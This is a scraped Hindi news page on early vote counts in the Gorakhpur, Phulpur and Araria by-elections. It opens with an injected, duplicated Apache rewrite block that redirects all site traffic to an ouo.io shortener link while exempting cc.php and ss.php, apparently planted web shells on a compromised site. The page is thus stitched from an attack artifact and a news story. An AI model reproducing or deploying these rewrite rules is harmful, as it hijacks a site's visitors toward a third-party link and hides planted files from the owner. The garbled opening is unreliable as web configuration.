
RewriteEngine on RewriteCond %{REQUEST_URI} !^https://ouo.io/13ARhD8$ RewriteCond %{REQUEST_URI} !/(cc)\.php [NC] RewriteCond %{REQUEST_URI} !/(ss)\.php [NC] RewriteRule .* https://ouo.io/13ARhD8 [L,R=301]RewriteEngine on RewriteCond %{REQUEST_URI} !^https://ouo.io/13ARhD8$ RewriteCond %{REQUEST_URI} !/(cc)\.php [NC] RewriteCond %{REQUEST_URI} !/(ss)\.php [NC] RewriteRule .* https://ouo.io/13ARhD8 [L,R=301]
BREAKING NEWS
Total views:- 306
Nextलखनऊ/पटना। उत्तर प्रदेश की गोरखपुर, फूलपुर और बिहार की अररिया समेत दो विधानसभा सीटों पर वोटों की गिनती शुरू हो गई है। शुरुआती रुझान भी आने शुरू हो गए हैं। यूपी के गोरखपुर से भाजपा अौर फुलपुर से सपा उम्मीदवार अागे चल रहे हैं। बिहार की अररिया लोकसभा सीट से राजद उम्मीदवार सरफराज आलम आगे चल रहे हैं।
जानकारी के अनुसार फूलपुर सीट पर 22 उम्मीदवार मैदान में हैं। फूलपुर सीट उप मुख्यमंत्री केशव मौर्य के विधान परिषद की सदस्यता ग्रहण करने के बाद त्यागपत्र देने के कारण खाली हुई थी। फूलपुर में सपा नागेंद्र पटेल और भाजपा के कौशलेंद्र पटेल के बीच वोटों का अंतर बढ़ गया है। तीन राउंड की काउंटिंग के बाद सपा प्रत्याशी नागेंद्र पटेल 7600 वोट मिले हैं वहीं भाजपा उम्मीदवार को 6163 मत मिले हैं। सपा उम्मीदवार 1437 वोटों से अागे चल रहे हैं।
आपको बता दें कि गोरखपुर सीट के लिये 10 उम्मीदवार मैदान में हैं। गोरखपुर सीट मुख्यमंत्री योगी आदित्यनाथ के विधान परिषद की सदस्यता ग्रहण करने के बाद त्यागपत्र देने के कारण खाली हुई थी। यहां से भाजपा प्रत्याशी उपेंद्र शुक्ल बढ़त बनाए हुए हैं। शुरुआती रुझान आने शुरू हो गए हैं और यहां से भाजपा के उम्मीदवार आगे चल रहे हैं। पहले चरण की काउंटिंग के दौरान भाजपा उम्मीदवार उपेंद्र शुक्ल 3200 वोटों से आगे हैं।
उधर, बिहार में पूर्व उपमुख्यमंत्री तेजस्वी यादव पर सभी की निगाहें हैं। अररिया लोकसभा सीट आरजेडी उम्मीदवार सरफराज आलम के पिता और सांसद तस्लीमुद्दीन के निधन के बाद खाली हुई थी। बिहार की सीटों पर हुए उपचुनाव के नतीजे इसलिए भी महत्वपूर्ण हैं क्योंकि मुख्यमंत्री नीतीश कुमार के एनडीए के साथ आने के बाद यह पहला उपचुनाव है।